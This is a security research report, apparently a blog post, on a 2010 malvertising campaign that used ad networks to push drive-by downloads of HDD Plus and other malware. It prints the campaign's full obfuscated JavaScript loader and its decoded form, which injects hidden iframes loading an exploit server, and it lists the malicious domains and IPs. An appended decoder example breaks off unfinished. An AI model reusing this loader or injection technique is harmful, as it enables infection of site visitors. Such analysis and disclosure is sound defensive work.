"HDD Plus" malware spread through major ad networks, using malvertising and drive-by download

(Credits: Wayne Huang, Caleb Sima, Chris Hsiao, NightCola Lin)

Over the past few days, we saw the quick spread of HDD Plus--a piece of malware that (somehow) gets installed on victim computers and holds the computer hostage by displaying a threatening message (that the system is failing), asking you to purchase a license so HDD Plus will fix the problems.

Information on HDD Plus can be found here and here.

We've realized that one of the ways HDD Plus spread was via drive-by download malvertising through (at least) DoubleClick and rad.msn.com, which are the world's largest ad serving platforms.

This is a detailed technical report.

Summary

Behavior: Users visit websites that incorporate banner ads from DoubleClick or rad.msn.com. Malicious JavaScript served from ADShufffle.com (notice the three f's) starts a drive-by download process and, if successful, HDD Plus and other malware are installed on the victim's machine, without any need to trick the victim into doing anything or clicking on anything. Simply visiting the page infects the visitor.

Known sites affected: Sites that incorporate DoubleClick or rad.msn.com banners, including for example Scout.com (using DoubleClick), realestate.msn.com, msnbc.com (using both), and mail.live.com. We'd like to note that it's very possible that multiple exchanges, besides those listed here, have been serving the fake ADShufffle's ads.

Important dates:

Dec 2nd: Registration of the associated malicious domains

Dec 3rd: HackAlert first detected this drive-by download being served by DoubleClick (2010-12-04T02:18:50+00:00GMT). We were not aware of it at the time (HackAlert flags too many URLs of live Web malware per day).

Dec 8th: We were requested by our partner, Symantec-VeriSign, to conduct an analysis on some of the affected websites and justify HackAlert's decision to take the VeriSign Trust Seal off these websites. Some of the websites had called Symantec's customer service line to ask for more information. HackAlert's flaggings were "on-and-off", which raised concerns that we had bugs in HackAlert. Symantec-VeriSign scans all of their Trust Seal customers for web malware and is very serious about the scan quality. They've always been quite strict about our scan quality (accuracy and coverage) and we've been working hard to keep them a satisfied partner.

On the same day we verified that it was the banner ads from DoubleClick, and replied to Symantec-VeriSign. Also on the same day, believing it was ADShuffle that was providing the malicious banner ad to DoubleClick, we notified Andrea McKee, President of ADShuffle. She replied very quickly to ask for detailed info, which we provided. She quickly pointed out that the domain was spelled with three f's and so was not her company's. She said that they really appreciated the detailed info, and that she would quickly inform DoubleClick.

Dec 9th: We reached out to DoubleClick and in less than a few hours' time they arranged a meeting with a group of their experts on anti-malvertising and incident response. We were very surprised and impressed with the speed with which DoubleClick acted. We provided details, and DoubleClick said they were already on top of the issue.

At the same time, our CEO Caleb Sima received a private email indicating that mail.live.msn, together with other big websites, was serving drive-by downloads via malvertising. We started to investigate other ad exchanges, because it was apparent that ADShufffle.com was able to trick multiple ad exchanges into serving their malicious JavaScript.

Dec 10th: Private sources provided detailed info to us, and we confirmed ADShufffle.com malvertising through rad.msn.com.

Exploits used:

Initially with DoubleClick:
1) Internet Explorer iepeers (CVE-2010-0806)

Later with DoubleClick and rad.msn.com:
2) JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
3) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
4) Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)
5) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()
6) Adobe Acrobat and Reader util.printf (CVE-2008-2992)
7) Adobe Reader GetMailInfo (CVE-2007-5659)

Malware installed:
Over the past week, ADShufffle kept on changing the malware. Besides HDD Plus, other types of malware, such as backdoors, have been served. Later in the article we will provide links to our observed binaries.

Exploit packs used:
Primarily a modified version of Eleonore. Neosploit was also used. With Neosploit, malicious binaries are obfuscated on-the-fly before being served.

Significant facts:
1. Drive-by download malvertising, visitors infected without having to click
2. Being served by the world's largest ad platforms. Large websites have been affected.
3. Exploits were very well obfuscated, manually.
4. Initial detection rate by antivirus vendors was very low.
5. At the time of writing, the ADShufffle.com group is still actively serving drive-by downloads via their registered domains. In fact, today they have registered yet more domains.

Associated domains and IPs

adshufffle.com (63.247.64.174) (serving JavaScript that generates iframes pointing to exploit servers)
acerdse.com, blindry.com, careepi.com, colemuns.com (91.213.217.194) (serving exploits and malware)
ssmmbb.com (91.213.217.193) (serving Java jar exploit)
feudari.com (91.213.217.192) (serving pdf exploit)
searchjewel.org (91.200.242.17) (serving malware)
195.5.161.10 (serving Java jar exploit)
thjlnqbtgdw.com, pbcplifpgdw.com (174.132.254.18) (serving exploits and malware)

Attack details


Illustration 1--DoubleClick ADShufffle drive-by download malvertising

Illustration 2--rad.msn.com ADShufffle drive-by download malvertising


Part 1--DoubleClick case study

We'll walk through DoubleClick's case first. When visiting a website that works with DoubleClick, for example Scout.com, the HTML served contains a DoubleClick ad tag for a 728x90 banner ad:
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from non-JavaScript browsers
document.writeln('<SCRIPT LANGUAGE="JavaScript" SRC="http://ad.doubleclick.net/adj/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=' + ord + '?" type="text/javascript">');
document.writeln('</SCRIPT>');
// end hide from browsers -->
</SCRIPT>
<noscript><a href="http://ad.doubleclick.net/jump/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" target="_blank"><img src="http://ad.doubleclick.net/ad/organicgardening/home;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" width="728" height="90" border="0" alt="" target="_blank"></a></noscript>

Trying to render this, the browser visits ad.doubleclick.net, and gets the following:
document.write('<script type=\"text/javascript\" src=\"http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=1953243&lpd=${4020322}&ASTPCT=${http://ad.doubleclick.net/click%3Bh%3Dv8/3a6a/3/0/%2a/w%3B233305186%3B0-0%3B0%3B12910146%3B3454-728/90%3B39673254/39691041/1%3B%3B%7Eaopt%3D2/1/7d/1%3B%7Esscs%3D%3f}\"><\/script>');document.write('\n<!-- Begin Interstitial Ad -->');
//PopUnder Power
//Credit notice must stay intact for use.
... script continues...

Getting the javascript from adshufffle.com yields:
var latency='';
var reno1='%78%53%4C%';
var reno2='78%53%4C%78%53%4C%53';
var reno3='%25%4C%4A%63%4C%43%25%4C%57%25';
var reno4='%4C%6D%63%';
var reno5='4C%48';
var reno6='%32%4';
var reno7='C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43';
var reno8='%32%4C%5F%25%4C%4F%6';
var reno9='3%4C%6D%63%4C%25%25%4C%53%63%4C%25%25%4C%42%63%4C%';
var reno10='25%57%4C%48%32%4C%70%32%4C%25%';
var reno11='57%4C%5F%32%4C%25%32%4C%48%32%4C%42%32%4';
var reno12='C%50%32%4C%25%57%4C%';
var reno13='32%32%4C%53%25%4C%25';
var reno14='%25%4C%53%63%4C%25%25%4C%42%63%4C%48%32%4C%63%32%4';
var reno15='C%50%32%4C%53%57%4C%63%57%4C%35%32%4C%53%25%4C%25%';
var reno16='25%4C%5F%32%4C%6D%32%4C%25%25%4C%42%63%4C%57%32%4C%6D%32%4C%43%32%4C%4F%32%4C%4F';
var reno17='%32%4C%5F%32%4C%25%5';
var reno18='7%4C%63%32%4C%63%57%4C%53%25%4C%25%25%4C%53%63%4C%';
var reno19='43%63%4C%25%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32';
var reno20='%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%25%25%4C%3';
var reno21='5%63%4C%25%63%4C%57%63%4C%25%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%25%25%4C%50%63%4C%43%63%4C%48%63%4C%50%63%4C%32%63%4C%53%63%4C%70%63%4C%50%63%4C%70%70%4C%63%63%4C%48%25%4C%48%32%4C%70%32%4C%5F%32%4C%6D%32%4C%32%70%4C%63%63%4C%48%25%4C%25%32%4C%32%70%4C%25%63%4C%48%25%4C%63%57%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%32%70%4C%25%63%4C%48%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%6D%25%4C%57%57%4C%57%57%4C%57%57%4C%32%70%4C%25%63%4C%48%25%4C%32%70%4C%25%63%4C%48%25%4C%50%70%4C%63%63%4C%48%25%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%5F%63%4C%42%63%4C%63%57%4C%63%32%4C%63%57%4C%63%57%4C%6D%57%4C%4A%63%4C%50%63%4C%5F%25%4C%70%32%4C%57%63%4C%5F%25%4C%50%63%4C%5F%25%4C%25%63%4C%42%63%4C%70%57%4C%53%57%4C%5F%32%4C%50%32%4C%6D%57%4C%4A%63%4C%4A%63%4C%50%63%4C%5F%25%4C%50%63%4C%70%63%4C%53%63%4C%50%63%4C%43%63%4C%32%63%4C%43%63%4C%63%63%4C%5F%25%4C%70%63%4C%48%63%4C%25%63%4C%63%63%4C%57%63%4C%32%63%4C%43%63%4C%63%63%4C%4A%63%4C%53%63%4C%43%63%4C%5F%25%4C%35%63%4C%25%63%4C%57%63%4C%42%25%4C%70%63%4C%48%63%4C%70%63%4C%63%63%4C%4A%63%4C%32%63%4C%70%63%4C%50%63%4C%53%63%4C%50%63%4C%43%63%4C%25%63%4C%50%63%4C%4A%63%4C%53%63%4C%4A%63%4C%53%63%4C%42%25%4C%53%63%4C%4A%63%4C%32%63%4C%35%63%4C%50%63%4C%48%63%4C%53%63%4C%63%63%4C%63%63%4C%63%63%4C%25%63%4C%4A%63%4C%57%57%4C%5F%25%4C%78%25%4C%5F%25%4C%53%63%4C%5F%25%4C%63%63%4C%5F%25%4C%50%32%4C%32%63%4C%50%32%4C%63%63%4C%5F%25%4C%35%63%4C%32%57%4C%42%63%4C%35%32%4C%4A%63%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%5F%25%4C%70%57%4C%48%32%4C%6D%32%4C%6D%25%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%48%32%4C%4F%32%4C%25%32%4C%48%57%4C%5F%32%4C%70%32%4C%6D%25%4C%70%32%4C%50%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%4F%32%4C%25%57%4C%48%57%4C%32%25%4C%53%63%4C%43%63%4C%42%63%4C%35%32%4C%32%25%4C%35%63%4C%25%63%4C%57%63%4C%42%63%4C%57%57%4C%32%25%4C%32%32%4C%57%57%4C%
63%57%4C%6D%25%4C%53%63%4C%43%63%4C%35%57%4C%35%63%4C%25%63%4C%57%63%4C%5F%48%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%43%57%4C%50%32%4C%70%32%4C%43%32%4C%4F%32%4C%5F%32%4C%35%70%4C%53%63%4C%50%63%4C%5F%25%4C%70%32%4C%25%57%4C%50%32%4C%63%32%4C%25%57%4C%32%32%4C%43%32%4C%57%32%4C%5F%48%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%5F%25%4C%48%32%4C%63%32%4C%25%57%4C%48%32%4C%42%32%4C%42%32%4C%5F%32%4C%63%70%4C%57%32%4C%43%32%4C%25%70%4C%50%32%4C%5F%25%4C%25%32%4C%70%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%25%57%4C%48%32%4C%70%32%4C%50%32%4C%5F%32%4C%4F%32%4C%42%25%4C%35%32%4C%63%57%4C%50%32%4C%4F%32%4C%32%32%4C%5F%25%4C%63%57%4C%25%57%4C%48%32%4C%6D%32%4C%6D%32%4C%50%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%25%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%4F%63%4C%57%25%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%42%57%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50
%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%48%32%4C%5F%48%4C%63%57%4C%78%32%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%53%25%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%3
2%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%70%57%4C%5F%32%4C%5F%32%4C%25%57%4C%42%63%4C%48%57%4C%32%25%4C%70%32%4C%32%63%4C%32%32%4C%50%63%4C%50%63%4C%35%63%4C%57%63%4C%48%63%4C%70%63%4C%57%63%4C%43%63%4C%63%63%4C%70%32%4C%57%63%4C%70%32%4C%43%63%4C%35%63%4C%63%32%4C%63%63%4C%25%32%4C%70%32%4C%63%32%4C%63%63%4C%48%63%4C%48%63%4C%53%63%4C%70%32%4C%63%63%4C%43%63%4C%48%32%4C%25%63%4C%43%63%4C%42%63%4C%43%57%4C%48%32%4C%4A%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%57%57%4C%5F%32%4C%35%32%4C%63%57%4C%5F%25%4C%57%32%4C%48%32%4C%63%57%4C%53%57%4C%48%57%4C%53%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%6D%32%4C%48%57%4C%42%32%4C%48%32%4C%4F%32%4C%5F%32%4C%63%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%43%53%4C%43%53%4C%78%53%4C%78%53%4C%4A%57%4C%53%25%4C%53%25%4C%48%32%4C%63%57%4C%4F%32%4C%48%32%4C%53%25%4C%53%25%4C%42%57%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%
4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%50%63%4C%42%63%4C%48%32%4C%32%25%4C%53%63%4C%42%63%4C%63%57%4C%32%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%70%57%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%4A%57%4C%53%25%4C%43%25%4C%53%25%4C%4F%32%4C%4F%32%4C%48%57%4C%6D%32%4C%53%25%4C%42%63%4C%50%25%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%35%25%4C%53%25%4C%32%32%4C%43%32%4C%78%53%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%35%25%4C%35%32%4C%63%32%4C%70%57%4C%50%32%4C%42%32%4C%6D%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%42%63%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%4A%63%4C%25%25%4C%25%25%4C%53%25%4C%42%63%4C%53%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%53%63%4C%53%63%4C%50%63%4C%35%25%4C%53%25%4C%5F%25%4C%53%25%4C%43%25%4C%43%25%4C%43%25%4C%50%63%4C
%42%25%4C%43%25%4C%25%25%4C%53%25%4C%25%25%4C%35%25%4C%32%32%4C%5F%70%4C%35%57%4C%48%32%4C%70%32%4C%6D%32%4C%43%70%4C%70%57%4C%63%57%4C%50%32%4C%4F%32%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%4F%25%4C%53%63%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%57%4C%25%32%4C%48%57%4C%63%57%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%42%25%4C%53%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%5
0%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%53%25%4C%42%63%4C%53%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%78%53%4C';
latency=reno1+reno2+reno3+reno4+reno5+reno6;
latency=latency+reno7+reno8+reno9+reno10+reno11+reno12+reno13;
latency=latency+reno14+reno15+reno16+reno17+reno18+reno19+reno20+reno21;

latency=unescape(latency);

var nerostrd=latency;
var i=nerostrd.length;
i=i-1;
var jamdv='';
for (var x = i; x >=0; x--)
{
jamdv=jamdv+nerostrd.charAt(x);
}
latency=jamdv;

var plemoza="012345"+"6789abcde"+"fghijklmn"+"opqrstuvwx"+"yzABCDEFGHIJ"+"KLMNOPQ"+"RSTUVWXYZ/.:_-?&=%";
var stroninfl="SP%cpH2W5C"+"83fEX:1r"+"jF9AQdM"+"lKi/sk4GuvtxJOB"+"m_U.Nq"+"zY7aw&nhgZo"+"VT=0IbRDye?6-L";


var fallingms="";
var rttcp;
var ferrana;
for(rttcp=0;rttcp<latency.length;rttcp++)
{
ferrana=stroninfl.indexOf(latency.charAt(rttcp));
var konterrap=1-2;
if(ferrana>konterrap)
{
fallingms+=plemoza.charAt(ferrana);
}
}
eval(unescape(fallingms));

The above obfuscated javascript decodes to:
statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var all_t = "";
var mtch = all_t.match(statictml);

if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_t.php?id=1953243&s=0&e=1' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E"));
} else {
document.write(unescape("%3Ciframe src='http://colemuns.com/pupseg/show.php?key=92e93d0553cdb3c89d7d397457811f6d&u=root' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_js_e.php?id=1953243' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
}

document.write('<iframe src="http://this.content.served.by.adshufffle.com/banners/flash-loader.php?src=http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf&w=728&h=90&url=http://ad.doubleclick.net/click;h=v8/3a6a/3/0/*/w;233305186;0-0;0;12910146;3454-728/90;39673254/39691041/1;;~aopt=2/1/7d/1;~sscs=?http%3A%2F%2Fwww.target.com%2FGiftCards%2Fb%3Fnode%3D14061591" width="728" height="90" scrolling="no" hspace="0" frameborder="0"></iframe>');

In the above script, colemuns.com/pupseg/show.php is where the exploit is. The all_t mechanism checks the visitor's timezone and can serve particular iframes depending on the timezone; this isn't used here.
http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf is the actual banner that gets displayed, which is copied from Target.
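
The three decoding layers of the adshufffle.com script above (unescape, string reversal, character substitution) can be reproduced statically, so an analyst recovers the hidden script and its iframe targets without running it. This is an added example, not code from the original analysis; the function names, the sample script and its .example hosts are constructed for illustration, and only the two alphabets are copied from the listing.

```javascript
// Static decoder for the loader shown above: same three layers, but the result
// is returned as text for analysis and is never passed to eval().

// Substitution alphabets, copied from the listing (plemoza / stroninfl).
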